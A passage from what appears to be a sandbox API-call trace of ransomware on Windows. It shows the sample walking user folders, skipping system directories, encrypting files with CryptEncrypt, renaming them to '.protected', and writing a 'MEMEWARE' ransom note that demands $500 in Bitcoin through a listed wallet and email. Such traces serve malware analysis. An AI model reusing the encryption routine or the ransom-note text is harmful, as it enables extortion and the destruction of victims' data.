HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Searches\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.protected")) returned 1 [0092.612] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Windows") returned -1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files") returned -1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files (x86)") returned -1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="$Recycle.bin") returned 1 [0092.612] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="System Volume Information") returned -1 [0092.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0092.612] StrStrIW (lpFirst="Everywhere.search-ms", lpSrch=".protected") returned 0x0 [0092.612] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.613] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Windows") returned -1 [0092.613] 
lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files") returned -1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files (x86)") returned -1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="$Recycle.bin") returned 1 [0092.613] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="System Volume Information") returned -1 [0092.613] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0092.613] StrStrIW (lpFirst="Indexed Locations.search-ms", lpSrch=".protected") returned 0x0 [0092.613] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.613] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.613] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.613] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.613] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.613] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\RESTORE_FILES.txt") returned 60 [0092.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\searches\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.614] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.614] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.614] lstrlenA (lpString="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") returned 684 [0092.614] 
WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.614] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.614] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.614] CloseHandle (hObject=0xa4) returned 1 [0092.614] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.614] lstrcmpiW (lpString1="SendTo", lpString2="Windows") returned -1 [0092.614] lstrcmpiW (lpString1="SendTo", lpString2="Program Files") returned 1 [0092.614] lstrcmpiW (lpString1="SendTo", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="SendTo", lpString2="$Recycle.bin") returned 1 [0092.615] lstrcmpiW (lpString1="SendTo", lpString2="System Volume Information") returned -1 [0092.615] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned 40 [0092.615] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0092.615] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0092.615] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned 42 [0092.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.615] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) 
returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="Windows") returned -1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files") returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="$Recycle.bin") returned 1 [0092.615] lstrcmpiW (lpString1="Start Menu", lpString2="System Volume Information") returned -1 [0092.615] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned 44 [0092.615] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0092.615] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0092.615] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned 46 [0092.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.615] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="Program Files") returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0092.615] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0092.615] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned 43 [0092.615] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0092.615] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0092.615] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*") returned 45 [0092.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.615] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="Windows") returned -1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="Program Files") returned 1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="Program Files (x86)") returned 1 [0092.615] lstrcmpiW (lpString1="Videos", lpString2="$Recycle.bin") returned 1 [0092.616] lstrcmpiW (lpString1="Videos", lpString2="System Volume Information") returned 1 [0092.616] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 40 [0092.616] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0092.616] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0092.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 42 [0092.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.616] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.616] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.616] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.616] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.616] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.") returned 42 [0092.616] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0092.616] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.616] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.616] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.616] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.616] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.616] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.616] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.616] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.616] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.616] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\..") returned 43 [0092.616] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.616] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.616] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.616] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.616] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.616] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.617] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="Windows") returned -1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="Program Files") returned -1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="Program Files (x86)") returned -1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="$Recycle.bin") returned 1 [0092.617] lstrcmpiW (lpString1="6LPEdpSi.flv", lpString2="System Volume Information") returned -1 [0092.617] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") returned 53 [0092.617] StrStrIW (lpFirst="6LPEdpSi.flv", lpSrch=".protected") returned 0x0 [0092.617] lstrcmpW (lpString1="6LPEdpSi.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.617] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.617] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lpedpsi.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") 
returned 53 [0092.617] StrStrW (lpFirst="6LPEdpSi.flv", lpSrch=".txt") returned 0x0 [0092.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") returned 53 [0092.618] StrStrW (lpFirst="6LPEdpSi.flv", lpSrch=".rar") returned 0x0 [0092.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv") returned 53 [0092.618] StrStrW (lpFirst="6LPEdpSi.flv", lpSrch=".zip") returned 0x0 [0092.618] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.618] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.618] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.619] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.619] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.619] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.619] CloseHandle (hObject=0xb4) returned 1 [0092.619] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv.protected") returned 63 [0092.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\6LPEdpSi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lpedpsi.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6LPEdpSi.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lpedpsi.flv.protected")) returned 1 [0092.620] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1="6pYE9WW", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW") returned 48 [0092.620] lstrcmpW (lpString1="6pYE9WW", lpString2=".") returned 1 [0092.620] lstrcmpW (lpString1="6pYE9WW", lpString2="..") returned 1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\*") returned 50 [0092.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.620] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\6pYE9WW\\.") returned 50 [0092.620] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.620] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.620] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\..") returned 51 [0092.620] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.620] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.620] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="Windows") returned -1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="Program Files") returned -1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="Program Files (x86)") returned -1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="$Recycle.bin") returned 1 [0092.620] lstrcmpiW (lpString1="5Hg5_ZPB.avi", lpString2="System Volume Information") returned -1 [0092.620] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.620] StrStrIW (lpFirst="5Hg5_ZPB.avi", lpSrch=".protected") returned 0x0 [0092.621] lstrcmpW (lpString1="5Hg5_ZPB.avi", lpString2="RESTORE_FILES.txt") returned -1 [0092.621] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.621] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\5hg5_zpb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.621] StrStrW (lpFirst="5Hg5_ZPB.avi", lpSrch=".txt") returned 0x0 [0092.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.621] StrStrW (lpFirst="5Hg5_ZPB.avi", lpSrch=".rar") returned 0x0 [0092.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi") returned 61 [0092.621] StrStrW (lpFirst="5Hg5_ZPB.avi", lpSrch=".zip") returned 0x0 [0092.621] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.622] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.622] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.622] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.622] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, 
lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.622] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.622] CloseHandle (hObject=0xd4) returned 1 [0092.623] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi.protected") returned 71 [0092.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\5hg5_zpb.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\5Hg5_ZPB.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\5hg5_zpb.avi.protected")) returned 1 [0092.840] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="Windows") returned -1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="Program Files") returned -1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="Program Files (x86)") returned -1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="$Recycle.bin") returned 1 [0092.840] lstrcmpiW (lpString1="KyM4mWn F0k Z", lpString2="System Volume Information") returned -1 [0092.840] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 